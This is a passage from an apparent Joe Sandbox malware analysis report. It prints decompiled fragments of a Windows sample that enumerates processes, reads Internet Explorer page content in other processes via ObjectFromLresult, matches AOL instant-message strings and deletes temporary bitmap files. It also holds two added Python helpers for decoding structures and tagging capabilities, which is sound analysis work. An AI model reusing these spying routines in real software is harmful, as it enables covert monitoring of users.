    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #2764$#800H_prologstrncmp
    • String ID: >IM From:$AOL Child$IM To:
    • API String ID: 687971048-2146893504
    • Opcode ID: 8db7466b390b1cf740e5e75a3ba9ec6ec5a59381e1fee9490f8d6d5d21952516
    • Instruction ID: b3b62cd0345b78c1711318b7908591559d21b39a65f22f4f38484eba1d5dfb8d
    • Opcode Fuzzy Hash: 8db7466b390b1cf740e5e75a3ba9ec6ec5a59381e1fee9490f8d6d5d21952516
    • Instruction Fuzzy Hash: E5018431500204BBCF20EF60D886A9D7720AB15338F60923FF836661D2E73C9719CA19
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00410B71(struct HINSTANCE__** __ecx) {
    				struct HINSTANCE__* _t4;
    				struct HINSTANCE__** _t13;
    
    				_t13 = __ecx;
    				_t4 = LoadLibraryA("WININET.DLL");
    				 *_t13 = _t4;
    				if(_t4 != 0) {
    					_t13[1] = GetProcAddress(_t4, "InternetGetConnectedState");
    					_t13[2] = GetProcAddress( *_t13, "InternetAutodialHangup");
    					_t13[3] = GetProcAddress( *_t13, "InternetAttemptConnect");
    				}
    				return _t13;
    			}
    0x00410b72
    0x00410b79
    0x00410b81
    0x00410b83
    0x00410b99
    0x00410ba5
    0x00410bac
    0x00410baf
    0x00410bb3

    APIs
    • LoadLibraryA.KERNEL32(WININET.DLL), ref: 00410B79
    • GetProcAddress.KERNEL32(00000000,InternetGetConnectedState), ref: 00410B92
    • GetProcAddress.KERNEL32(?,InternetAutodialHangup), ref: 00410B9E
    • GetProcAddress.KERNEL32(?,InternetAttemptConnect), ref: 00410BAA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: AddressProc$LibraryLoad
    • String ID: InternetAttemptConnect$InternetAutodialHangup$InternetGetConnectedState$WININET.DLL
    • API String ID: 2238633743-2055583813
    • Opcode ID: 5678fb8b73b11e393a7f8f2e9e2517adb259ee0a3a870393ab9af17a2edbf39b
    • Instruction ID: fbec895e31b84ae0f9bb96512bd8d5310b3b2ecfbf6ea030c8671e5acdcc45b5
    • Opcode Fuzzy Hash: 5678fb8b73b11e393a7f8f2e9e2517adb259ee0a3a870393ab9af17a2edbf39b
    • Instruction Fuzzy Hash: B6E01276600300AF97216F6ADC09E16FAE8EE95B52321842FE885D3161D6B4A940CF58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 55%
    			E00424FBF() {
    				CHAR** _t8;
    				CHAR** _t10;
    				void* _t17;
    
    				 *((intOrPtr*)(_t17 - 0x28)) =  *((intOrPtr*)(_t17 - 0x14));
    				_push("temporary.bmp");
    				_t8 = _t17 + 8;
    				_push(0x4558c8);
    				_push(_t8);
    				L0043DE20();
    				DeleteFileA( *_t8);
    				L0043DD36();
    				_push("th_temp.bmp");
    				_t10 = _t17 + 8;
    				_push(0x4558c8);
    				_push(_t10);
    				L0043DE20();
    				DeleteFileA( *_t10);
    				L0043DD36();
    				 *0x4558fc =  *0x4558fc & 0x00000000;
    				return E00425049;
    			}
    0x00424fc7
    0x00424fca
    0x00424fcf
    0x00424fd2
    0x00424fd3
    0x00424fd4
    0x00424fe1
    0x00424fe6
    0x00424feb
    0x00424ff0
    0x00424ff3
    0x00424ff4
    0x00424ff5
    0x00424ffc
    0x00425001
    0x00425006
    0x00425012

    APIs
    • #924.MFC42(?,004558C8,temporary.bmp), ref: 00424FD4
    • DeleteFileA.KERNEL32(00000000,?,004558C8,temporary.bmp), ref: 00424FE1
    • #800.MFC42 ref: 00424FE6
    • #924.MFC42(?,004558C8,th_temp.bmp), ref: 00424FF5
    • DeleteFileA.KERNEL32(00000000,?,004558C8,th_temp.bmp), ref: 00424FFC
    • #800.MFC42 ref: 00425001
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800#924DeleteFile
    • String ID: temporary.bmp$th_temp.bmp
    • API String ID: 1881785514-137730247
    • Opcode ID: eb9bce4a6509e3471cba5f46eea1d1e39a1e8eb1f961e9ca51059d6b3b73d491
    • Instruction ID: 4a62759221be7de2b31315c70a721f43cf1daaf41852fa5a8627f5c81c95be7f
    • Opcode Fuzzy Hash: eb9bce4a6509e3471cba5f46eea1d1e39a1e8eb1f961e9ca51059d6b3b73d491
    • Instruction Fuzzy Hash: 9AF08C75800208AACB10FF51EC05ADE3BA4EF19350F404026F804AB161C738AE08CB98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004099DC(intOrPtr* __ecx) {
    				struct HINSTANCE__* _t8;
    				intOrPtr* _t14;
    
    				_t14 = __ecx;
    				E0040FB90(__ecx);
    				 *__ecx = 0x4461e4;
    				 *((intOrPtr*)(_t14 + 4)) = RegisterWindowMessageA("WM_HTML_GETOBJECT");
    				_t8 = LoadLibraryA("OLEACC.DLL");
    				 *(_t14 + 8) = _t8;
    				 *((intOrPtr*)(_t14 + 0xc)) = GetProcAddress(_t8, "ObjectFromLresult");
    				 *((intOrPtr*)(_t14 + 0x10)) = GetProcAddress( *(_t14 + 8), "AccessibleChildren");
    				return _t14;
    			}
    (Disassembly address column only; the instruction listing did not survive extraction.)

    APIs
    • RegisterWindowMessageA.USER32(WM_HTML_GETOBJECT,?,00000000,0040AC66,?,0040AC49,?,0040FC7F,?,00000000), ref: 004099F0
    • LoadLibraryA.KERNEL32(OLEACC.DLL,?,0040FC7F,?,00000000), ref: 004099FE
    • GetProcAddress.KERNEL32(00000000,ObjectFromLresult), ref: 00409A13
    • GetProcAddress.KERNEL32(?,AccessibleChildren), ref: 00409A20
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: AddressProc$LibraryLoadMessageRegisterWindow
    • String ID: AccessibleChildren$OLEACC.DLL$ObjectFromLresult$WM_HTML_GETOBJECT
    • API String ID: 3403540151-1075632032
    • Opcode ID: 2d6f56728af18d13c2291ab284d291d549b8f829eb7fb3a1c4042d7b2daef0b5
    • Instruction ID: 67a61ac04c5aeda9984eeab19f7febfff46c15714de567a3e76a348e21701281
    • Opcode Fuzzy Hash: 2d6f56728af18d13c2291ab284d291d549b8f829eb7fb3a1c4042d7b2daef0b5
    • Instruction Fuzzy Hash: 85E06D71A00304AFC320AF7AEC0AA06BBE4EE85792311883FE445D3621E7B8E5448F48
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 54%
    			E00428C64(void* __eflags, intOrPtr _a4) {
    				signed int _v8;
    				signed int _v12;
    				char _v16;
    				char _v20;
    				char _v280;
    				intOrPtr _v300;
    				intOrPtr _v308;
    				void _v312;
    				void* _v316;
    				void _v860;
    				char _v864;
    				char _v1116;
    				void* _t36;
    				void* _t43;
    				unsigned int _t53;
    				long* _t62;
    				signed int _t63;
    				void* _t74;
    				void* _t75;
    				void* _t76;
    				void* _t77;
    				void* _t78;
    
    				if(E00428A6B() == 0) {
    					_t63 = 0x49;
    					_v316 = 0;
    					memset( &_v312, 0, _t63 << 2);
    					_t77 = _t76 + 0xc;
    					_t36 = CreateToolhelp32Snapshot(2, 0);
    					_t74 = _t36;
    					if(_t74 == 0xffffffff) {
    						L17:
    						return _t36;
    					}
    					_v316 = 0x128;
    					if(Process32First(_t74,  &_v316) == 0) {
    						L16:
    						return CloseHandle(_t74);
    					}
    					_v864 = 0;
    					memset( &_v860, 0, 0x88 << 2);
    					_t78 = _t77 + 0xc;
    					do {
    						_t43 = E004288B3(_v308, _v300,  &_v864, 0x224);
    						_t78 = _t78 + 0x10;
    						if(_t43 != 0) {
    							E004283A6(_a4,  &_v280);
    						}
    					} while (Process32Next(_t74,  &_v316) != 0);
    					goto L16;
    				}
    				_t36 =  *0x455bb0( &_v1116, 0x320,  &_v12);
    				if(_t36 == 0) {
    					goto L17;
    				}
    				_v8 = _v8 & 0x00000000;
    				if((_v12 & 0xfffffffc) <= 0) {
    					goto L17;
    				} else {
    					_t62 =  &_v1116;
    					do {
    						_t75 = OpenProcess(0x410, 0,  *_t62);
    						if(_t75 > 0) {
    							_push( &_v20);
    							_push(4);
    							_push( &_v16);
    							_push(_t75);
    							if( *0x455bac() != 0) {
    								_push(0x104);
    								_push( &_v280);
    								_push(_v16);
    								_push(_t75);
    								if( *0x455ba8() > 0) {
    									E004283A6(_a4,  &_v280);
    								}
    							}
    						}
    						CloseHandle(_t75);
    						_v8 = _v8 + 1;
    						_t53 = _v12 >> 2;
    						_t62 =  &(_t62[1]);
    					} while (_v8 < _t53);
    					return _t53;
    				}
    			}
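    The Toolhelp branch above fills a PROCESSENTRY32 that starts at `_v316`: the decompiler names locals by their distance below the frame base, so the struct occupies `_v316` up to (not including) `_v20`, which is why the code stores 0x128 (296, the size of the 32-bit ANSI PROCESSENTRY32) into `_v316` before calling Process32First, reads the process ID from `_v308` (offset 8) and passes `&_v280` (offset 36, `szExeFile`) to E004283A6 in both branches. The following added example, which is not part of the sample and not Joe Sandbox code, maps those `_vN` names onto the documented 32-bit ANSI PROCESSENTRY32 layout and decodes a constructed entry. The byte buffers are built here, not captured from the sample, and the back-to-back snapshot layout is a convenience for the example only; the real API hands out one entry per call.

```python
"""Map the decompiler's frame-relative locals in E00428C64 onto the 32-bit
ANSI PROCESSENTRY32 layout and decode a constructed Toolhelp entry.

Added example for this report page; not part of the sample or of Joe Sandbox.
"""
import re
import struct

# Field order and sizes of the 32-bit ANSI PROCESSENTRY32 (tlhelp32.h).
# th32DefaultHeapID is ULONG_PTR, i.e. 4 bytes inside a 32-bit process.
PROCESSENTRY32_FIELDS = [
    ("dwSize", "I"), ("cntUsage", "I"), ("th32ProcessID", "I"),
    ("th32DefaultHeapID", "I"), ("th32ModuleID", "I"), ("cntThreads", "I"),
    ("th32ParentProcessID", "I"), ("pcPriClassBase", "i"), ("dwFlags", "I"),
    ("szExeFile", "260s"),          # MAX_PATH chars, NUL-terminated
]
PROCESSENTRY32_FMT = "<" + "".join(fmt for _, fmt in PROCESSENTRY32_FIELDS)
PROCESSENTRY32_SIZE = struct.calcsize(PROCESSENTRY32_FMT)   # 0x128


def field_at(offset):
    """Name of the field that starts exactly at byte `offset`, else None."""
    pos = 0
    for name, fmt in PROCESSENTRY32_FIELDS:
        if pos == offset:
            return name
        pos += struct.calcsize("<" + fmt)
    return None


LOCAL = re.compile(r"_v(\d+)$")


def resolve_local(base_local, local):
    """Translate a decompiler local `_vN` (N = bytes below the frame base) into
    (offset, field) within the struct whose first byte is `base_local`."""
    base = int(LOCAL.match(base_local).group(1))
    offset = base - int(LOCAL.match(local).group(1))
    if not 0 <= offset < PROCESSENTRY32_SIZE:
        raise ValueError(f"{local} lies outside the struct at {base_local}")
    return offset, field_at(offset)


def make_entry(pid, ppid, exe, threads=1):
    """Constructed entry, filled the way Process32First/Next would fill it."""
    return struct.pack(PROCESSENTRY32_FMT, PROCESSENTRY32_SIZE, 0, pid, 0, 0,
                       threads, ppid, 8, 0, exe.encode("latin-1"))


def decode_entry(buf):
    """Unpack one entry; the caller must have set dwSize, as the sample does."""
    if len(buf) < PROCESSENTRY32_SIZE:
        raise ValueError("buffer shorter than PROCESSENTRY32")
    values = struct.unpack_from(PROCESSENTRY32_FMT, buf)
    entry = dict(zip((name for name, _ in PROCESSENTRY32_FIELDS), values))
    if entry["dwSize"] != PROCESSENTRY32_SIZE:
        raise ValueError(f"unexpected dwSize {entry['dwSize']:#x}")
    entry["szExeFile"] = entry["szExeFile"].split(b"\0", 1)[0].decode("latin-1")
    return entry


def walk_snapshot(buf):
    """Iterate a constructed buffer of back-to-back entries, mirroring the
    Process32First/Process32Next loop in the decompiled function."""
    entries = []
    for off in range(0, len(buf) - PROCESSENTRY32_SIZE + 1, PROCESSENTRY32_SIZE):
        entries.append(decode_entry(buf[off:off + PROCESSENTRY32_SIZE]))
    return entries


if __name__ == "__main__":
    for local in ("_v316", "_v308", "_v300", "_v280"):
        print(local, "->", resolve_local("_v316", local))
    snapshot = make_entry(4, 0, "System", 120) + make_entry(5412, 1234, "executable.4420.exe")
    for e in walk_snapshot(snapshot):
        print(e["th32ProcessID"], e["th32ParentProcessID"], e["szExeFile"])
```

Running it reproduces the three offsets the decompiled loop relies on and shows that `_v300` (offset 16) is `th32ModuleID`, which the page itself does not name.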

    (Disassembly address column only; the instruction listing did not survive extraction.)

    APIs
      • Part of subcall function 00428A6B: GetVersionExA.KERNEL32(?), ref: 00428A85
    • EnumProcesses.PSAPI(?,00000320,?), ref: 00428C8D
    • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00428CC1
    • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00428CD8
    • GetModuleFileNameExA.PSAPI(00000000,?,?,00000104), ref: 00428CF2
      • Part of subcall function 004283A6: #823.MFC42(?,?,00000000,00428DAD,?), ref: 004283BE
      • Part of subcall function 004283A6: memcpy.MSVCRT ref: 004283D5
      • Part of subcall function 004283A6: #825.MFC42(?,?,00000000,00428DAD,?), ref: 004283E0
      • Part of subcall function 004283A6: strlen.MSVCRT ref: 004283F4
      • Part of subcall function 004283A6: #823.MFC42(00000001,00428DAD,00000000,00428DAD,?), ref: 004283FB
      • Part of subcall function 004283A6: strcpy.MSVCRT(?,00428DAD,00000001,00428DAD,00000000,00428DAD,?), ref: 00428416
    • CloseHandle.KERNEL32(00000000), ref: 00428D0C
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00428D3C
    • Process32First.KERNEL32(00000000,?), ref: 00428D5B
    • Process32Next.KERNEL32(00000000,00000128), ref: 00428DB5
    • CloseHandle.KERNEL32(00000000), ref: 00428DC0
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #823CloseEnumHandleProcessProcess32$#825CreateFileFirstModuleModulesNameNextOpenProcessesSnapshotToolhelp32Versionmemcpystrcpystrlen
    • String ID:
    • API String ID: 2808399935-0
    • Opcode ID: b542e01e4dbfdb1c792924314c236e6a63cfb5aca8e9845f1cd03be2880c5656
    • Instruction ID: aed8b7ee01ba0d2c859e0179e6b0f3515664f5e8f4bc73c22d3204cadf6d76ab
    • Opcode Fuzzy Hash: b542e01e4dbfdb1c792924314c236e6a63cfb5aca8e9845f1cd03be2880c5656
    • Instruction Fuzzy Hash: 94418671A01628ABDB219B60EC44BEE77BCEF14755F4001AAF605E21D1DF34DB498B58
    Uniqueness

    Uniqueness Score: -1.00%
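    The per-function "APIs" lists are where the report's capability verdicts come from: E004099DC registers WM_HTML_GETOBJECT and resolves OLEACC!ObjectFromLresult, which is the Microsoft-documented way to obtain an IHTMLDocument2 pointer for an Internet Explorer window owned by another process (a browser-content grabbing primitive), and E00428C64 enumerates every process and its main module path via PSAPI with a Toolhelp32 fallback selected on the GetVersionExA result. The following added example, which is not Joe Sandbox code and not code from the sample, parses API lines in the report's own format, including the "Part of subcall function" prefix, strips hex and "?" placeholders from the argument lists, and folds the remaining API names and string arguments into capability tags. The sample lines are copied in format from the E004099DC and E00428C64 entries above and from the DeleteFileA fragment at 00424FD4; the tag rules and the key name `fragment_00424FD4` are this example's own assumptions.

```python
"""Turn the per-function "APIs" lists of a Joe Sandbox report into capability tags.

Added example for this report page; not Joe Sandbox code.  The tag rules are
this example's own reading of the API combinations, not the sandbox's.
"""
import re

# "• Name.MODULE(args), ref: ADDR", optionally prefixed with the
# "Part of subcall function XXXXXXXX:" marker the report uses for callees.
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>#?\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"
)
HEX32 = re.compile(r"[0-9A-Fa-f]{8}")   # an 8-digit hex token is a value, not a string

# Constructed input: lines copied in format from the report, keyed by the
# decompiler's function name; the fragment's name is not in the excerpt,
# so it is keyed by the address of its first listed API (assumption).
SAMPLE_REPORT = {
    "E004099DC": """
    • RegisterWindowMessageA.USER32(WM_HTML_GETOBJECT,?,00000000,0040AC66,?,0040AC49,?,0040FC7F,?,00000000), ref: 004099F0
    • LoadLibraryA.KERNEL32(OLEACC.DLL,?,0040FC7F,?,00000000), ref: 004099FE
    • GetProcAddress.KERNEL32(00000000,ObjectFromLresult), ref: 00409A13
    • GetProcAddress.KERNEL32(?,AccessibleChildren), ref: 00409A20
    """,
    "E00428C64": """
      • Part of subcall function 00428A6B: GetVersionExA.KERNEL32(?), ref: 00428A85
    • EnumProcesses.PSAPI(?,00000320,?), ref: 00428C8D
    • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00428CC1
    • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00428CD8
    • GetModuleFileNameExA.PSAPI(00000000,?,?,00000104), ref: 00428CF2
    • CloseHandle.KERNEL32(00000000), ref: 00428D0C
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00428D3C
    • Process32First.KERNEL32(00000000,?), ref: 00428D5B
    • Process32Next.KERNEL32(00000000,00000128), ref: 00428DB5
    • CloseHandle.KERNEL32(00000000), ref: 00428DC0
    """,
    "fragment_00424FD4": """
    • #924.MFC42(?,004558C8,temporary.bmp), ref: 00424FD4
    • DeleteFileA.KERNEL32(00000000,?,004558C8,temporary.bmp), ref: 00424FE1
    • #800.MFC42 ref: 00424FE6
    • #924.MFC42(?,004558C8,th_temp.bmp), ref: 00424FF5
    • DeleteFileA.KERNEL32(00000000,?,004558C8,th_temp.bmp), ref: 00424FFC
    • #800.MFC42 ref: 00425001
    """,
}

# Each rule: every API in "all" must appear, at least one of "any" must appear,
# and every string argument in "strings" must appear somewhere in the function.
CAPABILITY_RULES = [
    ("process-enumeration",
     {"any": {"EnumProcesses", "CreateToolhelp32Snapshot", "Process32First"}}),
    ("module-path-lookup", {"any": {"GetModuleFileNameExA", "GetModuleFileNameExW"}}),
    ("dynamic-api-resolution", {"all": {"LoadLibraryA", "GetProcAddress"}}),
    # WM_HTML_GETOBJECT plus OLEACC!ObjectFromLresult is the documented route to
    # an IHTMLDocument2 interface of an Internet Explorer window in another process.
    ("ie-dom-access", {"strings": {"WM_HTML_GETOBJECT", "ObjectFromLresult"}}),
    ("file-deletion", {"any": {"DeleteFileA", "DeleteFileW"}}),
]


def parse_api_lines(text):
    """Return one dict per API line; raises on a line that is not in report format."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = API_LINE.match(line)
        if m is None:
            raise ValueError(f"unrecognised API line: {line!r}")
        args = [a for a in (m["args"] or "").split(",") if a]
        # Keep only arguments the sandbox resolved to a string; "?" is unknown
        # and an 8-digit hex token is a numeric or pointer value.
        strings = [a for a in args if a != "?" and not HEX32.fullmatch(a)]
        calls.append({"api": m["api"], "module": m["module"], "args": args,
                      "strings": strings, "ref": int(m["ref"], 16),
                      "subcall": m["sub"]})
    return calls


def tag_function(calls):
    """Apply CAPABILITY_RULES to a function's calls (subcall lines included)."""
    apis = {c["api"] for c in calls}
    strings = {s for c in calls for s in c["strings"]}
    tags = set()
    for tag, rule in CAPABILITY_RULES:
        if rule.get("all", set()) - apis:
            continue
        if "any" in rule and not (rule["any"] & apis):
            continue
        if rule.get("strings", set()) - strings:
            continue
        tags.add(tag)
    return tags


def summarise(report):
    """Map function name -> sorted capability tags for a whole report excerpt."""
    return {fn: sorted(tag_function(parse_api_lines(text))) for fn, text in report.items()}


if __name__ == "__main__":
    for fn, tags in summarise(SAMPLE_REPORT).items():
        print(f"{fn}: {', '.join(tags) or '-'}")
```

The rules deliberately key on string arguments as well as API names, because the sample resolves ObjectFromLresult through GetProcAddress rather than importing it, so an import-table check alone would miss the browser-access capability.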

    C-Code - Quality: 37%
    			E0041B45F(void* __ecx) {
    				void* __esi;
    				void* _t13;
    				intOrPtr _t23;
    				intOrPtr _t26;
    				void* _t30;
    				void* _t46;
    
    				_t46 = __ecx;
    				L0043DF94();
    				_push(1);
    				_push(0x808080);
    				_push(0x10101);
    				_push(0xefefef);
    				_push(__ecx);
    				_push(0x468);
    				L00404F47(_t13, __ecx + 0x64, __ecx);
    				_push( *((intOrPtr*)(_t46 + 0x60)) + 0x369);
    				_push(0x469);
    				L0043E06C();
    				_push( *((intOrPtr*)(_t46 + 0x60)) + 0x469);
    				_push(0x433);
    				L0043E06C();
    				_push( *((intOrPtr*)(_t46 + 0x60)) + 0x4e9);
    				_push(0x469);
    				L0043E06C();
    				_push( *((intOrPtr*)(_t46 + 0x60)) + 0x569);
    				_push(0x435);
    				L0043E06C();
    				_t23 =  *((intOrPtr*)(_t46 + 0x60));
    				_push(0);
    				_push( *((intOrPtr*)(_t23 + 0x106c)));
    				_push(0x46a);
    				L0043E2E8();
    				_push(0x434);
    				L0043E066();
    				SendMessageA( *(_t23 + 0x20), 0xcc, 0x2a, 0);
    				_t45 = _t46 + 0xb8;
    				E0040CF63(_t46 + 0xb8, 0x323232, 1);
    				if(_t46 != 0) {
    					_t26 =  *((intOrPtr*)(_t46 + 0x20));
    				} else {
    					_t26 = 0;
    				}
    				E0040CF2E(_t45, 1, 0x4550cc, 0, 0, 0, 0x5a2, _t26);
    				_push( *( *((intOrPtr*)(_t46 + 0x60)) + 0x368) & 0x000000ff);
    				_push(0x421);
    				L0043DF82();
    				_t30 = 1;
    				return _t30;
    			}
    (Disassembly address column only; the instruction listing did not survive extraction.)

    APIs
    • #4710.MFC42 ref: 0041B464
    • #5953.MFC42(00000469,?,?,00EFEFEF,00010101,00808080,00000001), ref: 0041B499
    • #5953.MFC42(00000433,?,00000469,?,?,00EFEFEF,00010101,00808080,00000001), ref: 0041B4AB
    • #5953.MFC42(0000039E,?,00000433,?,00000469,?,?,00EFEFEF,00010101,00808080,00000001), ref: 0041B4BF
    • #5953.MFC42(00000435,?,0000039E,?,00000433,?,00000469,?,?,00EFEFEF,00010101,00808080,00000001), ref: 0041B4D4
    • #5951.MFC42(0000046A,?,00000000,00000435,?,0000039E,?,00000433,?,00000469,?,?,00EFEFEF,00010101,00808080,00000001), ref: 0041B4EC
    • #3092.MFC42(0000039E,0000046A,?,00000000,00000435,?,0000039E,?,00000433,?,00000469,?,?,00EFEFEF,00010101,00808080), ref: 0041B4F4
    • SendMessageA.USER32(?,000000CC,0000002A,00000000), ref: 0041B504
